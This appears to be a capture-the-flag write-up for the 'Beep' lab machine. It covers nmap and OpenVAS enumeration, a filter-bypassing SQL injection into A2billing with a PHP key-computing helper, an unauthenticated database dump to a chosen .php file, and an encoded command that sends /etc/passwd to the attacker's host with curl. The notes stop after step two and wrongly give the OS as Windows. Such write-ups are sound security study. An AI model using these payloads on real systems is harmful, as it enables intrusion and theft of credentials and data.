Beep
Starting information
Machine IP : 10.10.10.7 System : Windows
Network enumeration
I start by modifying my /etc/hosts file to avoid writing the IP everytime :
10.10.10.7 beep
Then I look for open ports and start an openvas scan:
nmap -p- beep -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-29 19:14 CEST
Nmap scan report for beep (10.10.10.7)
Host is up (0.034s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
879/tcp open unknown
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
4190/tcp open sieve
4445/tcp open upnotifyp
4559/tcp open hylafax
5038/tcp open unknown
10000/tcp open snet-sensor-mgmt
Now I can start nmap scripts on the open ports to gather more information:
nmap -p22,25,80,110,11,143,443,879,993,995,3306,4190,445,4559,5038,10000 -A -Pn beep
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-29 19:16 CEST
Nmap scan report for beep (10.10.10.7)
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
11/tcp closed systat
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://beep/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE UIDL PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) APOP STLS RESP-CODES EXPIRE(NEVER) USER LOGIN-DELAY(0) TOP
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: THREAD=REFERENCES LIST-SUBSCRIBED NAMESPACE MAILBOX-REFERRALS URLAUTHA0001 RENAME LITERAL+ LISTEXT IDLE UIDPLUS CONDSTORE RIGHTS=kxte IMAP4rev1 CATENATE STARTTLS ANNOTATEMORE CHILDREN ID Completed QUOTA THREAD=ORDEREDSUBJECT MULTIAPPEND SORT SORT=MODSEQ OK ATOMIC NO UNSELECT IMAP4 X-NETSCAPE BINARY ACL
443/tcp open ssl/https?
|_ssl-date: 2019-09-29T17:13:59+00:00; -2m53s from scanner time.
445/tcp closed microsoft-ds
879/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: -2m53s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.95 seconds
Information gathered
My OpenVAS scan is now finished, from nmap and OpenVas here is what I know:
Operating System
Windows
Open ports
| Port | Service |
|---|---|
| 22/tcp | ssh |
| 25/tcp | smtp |
| 80/tcp | http |
| 110/tcp | pop3 |
| 111/tcp | rpcbind |
| 143/tcp | imap |
| 443/tcp | https |
| 879/tcp | unknown |
| 993/tcp | imaps |
| 995/tcp | pop3s |
| 3306/tcp | mysql |
| 4190/tcp | sieve |
| 4445/tcp | upnotifyp |
| 4559/tcp | hylafax |
| 5038/tcp | unknown |
| 10000/tcp | snet-sensor-mgmt |
Vulnerabilities
Multiple vulnerabilities were detected. Below are the ones with a high severity:
| CVE | Service | Description |
|---|---|---|
| CVE-2013-3213 | 443/tcp | Vtiger CRM Multiple SQL Injection Vulnerabilities |
| CVE-2002-0756 | 10000/tcp | Webmin / Usermin Login Cross Site Scripting Vulnerability |
| 443/tcp | vtiger CRM ‘graph.php ‘ Script Authentication Bypass Vulnerability | |
| CVE-2012-4869, CVE-2012-4870 | 443/tcp | FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities |
| CVE-2016-4834, CVE-2016-1713 | 443/tcp | VTiger CRM Privilege Escalation and Unrestricted File Upload Vulnerability |
| CVE-2019-12840 | 10000/tcp | Webmin <= 1.910 Remote Code Execution (RCE) Vulnerability |
| OS | OS End Of Life Detection Mitigation | |
| CVE-2014-7235 | 443/tcp | FreePBX ‘index.php’ Remote Command Execution Vulnerability |
| 443/tcp | A2billing Backup File Download / Remote Code Execution Vulnerabilities |
Exploits
Fuzzing Elastix login page at https://10.10.10.7/ did not work. Fuzzing Webmin login page https://10.10.10.7:10000/session_login.cgi gets us locked after too many attempts.
Error - Access denied for 10.10.14.4. The host has been blocked because of too many authentication failures.
zaproxy is not very good here since the maximum delay time we can set between attempts is 1 second.
hydra ssh brute force : no luck.
Testing PHP code
- Create a directory
test. - Create a file
index.phpwith some php code inside. - Run
sudo docker run --rm -v $(pwd):/app -w /app -p 8989:8989 php php -S 0.0.0.0:8989 - Navigate to http://localhost:8989
Some sample php code :
<html>
<head>
<title>PHP Test</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>
Compute the payload
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Compute security key</title>
</head>
<body>
<?php
function securitykey($data)
{
// RFC 2104 HMAC implementation for php.
// Creates an md5 HMAC.
// Eliminates the need to install mhash to compute a HMAC
// Hacked by Lance Rushing
$key = "asdf1212fasd121554sd4f5s45sdf";
$data = bin2hex($data);
$data = "9^456789111111 union select 1,2,3,4,0x706c75676e706179,0x".$data.",7,8,9,10,11,12,13-- -^3^2";
$b = 64; // byte length for md5
if (strlen($key) > $b) {
$key = pack("H*", md5($key));
}
$key = str_pad($key, $b, chr(0x00));
$ipad = str_pad('', $b, chr(0x36));
$opad = str_pad('', $b, chr(0x5c));
$k_ipad = $key ^ $ipad;
$k_opad = $key ^ $opad;
return md5($k_opad . pack("H*", md5($k_ipad . $data)));
}
?>
<? if ($_POST['payload'] != '') {?>
<h1>Security Key</h1>
<p>Key = <? echo securitykey($_POST['payload']); ?></p>
<p>Payload = </p>
<p> <? echo "transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x".bin2hex($_POST['payload']).",7,8,9,10,11,12,13-//**- -&sess_id=".$_POST['sessid']."&key=".securitykey($_POST['payload']); ?></p>
<a href="index.php">Compute transaction ID</a>
<? } else { ?>
<form action="index.php" method="post">
<label for="payload">PHP Payload</label>
<input type="text" name="payload">
<label for="sessid">Session ID</label>
<input type="text" name="sessid">
<input type="submit" name="compute" value="Compute Security Key">
</form>
<? } ?>
</body>
</html>
encode64 'system('\''x=$(cat /etc/passwd);curl -d ${x} http://10.10.14.10:8000/0x4148.jnk'\'');' | tr -d '\n'
c3lzdGVtKCd4PSQoY2F0IC9ldGMvcGFzc3dkKTtjdXJsIC1kICR7eH0gaHR0cDovLzEwLjEwLjE0LjEwOjgwMDAvMHg0MTQ4LmpuaycpOw==
wget ‘https://10.10.10.7/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x7777.php’ –no-check-certificate
wget ‘https://10.10.10.7/a2billing/admin/Public/0x7777.php’ –no-check-certificate
Three steps to the exploit.
Step 1 : SQL Injection
We exploit a flaw in checkout_process.php to inject some php code in the database.
Here is the faulty code:
$QUERY = "SELECT id, agent_id, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires, creationdate, status, cvv, credit_card_type, currency " .
" FROM cc_epayment_log_agent " .
" WHERE id = ".$transactionID." AND (status = 0 OR (status = 2 AND $NOW_2MIN))";
$transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY)
As we can see $transactionID is injectable. There are some more quirks to the injection, we have to bypass some filters and make sure our key parameter is properly computed more info can be found on 0x4148’s blog.
Here we inject <?php echo "magnolia3738" ?> which is 3c3f706870206563686f206d61676e6f6c696133373338203f3e in hex:
wget --post-data "transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206563686f20226d61676e6f6c696133373338223b203f3e,7,8,9,10,11,12,13-//**- -&sess_id=1234&key=808448f76bfc13cef5c64521edf7f45d" https://10.10.10.7/a2billing/agent/Public/checkout_process.php --no-check-certificate
Step 2 : Backup Dump
Another vulnerability allows us to dump the database to a file of our choosing without being authenticated.
The faulty parts of the code are from the file FG_var_backup.inc:
This line prepares the backup.
$run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."' -p'".PASS."' > '{$backup_file}'";
But as we can see earlier on in the file the variable $backup_file can be controlled by the user:
if ($form_action == 'add'){
$backup_file = $path;
Since the file A2B_entity_backup.php includes FG_var_backup.inc, we can craft a post request to trigger the database dump and choose the filename:
wget 'https://10.10.10.7/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=mycode.php' --no-check-certificate
Once this link is visited, the dump should be available at https://10.10.10.7/a2billing/admin/Public/mycode.php.
wget 'https://10.10.10.7/a2billing/admin/Public/mycode.php' --no-check-certificate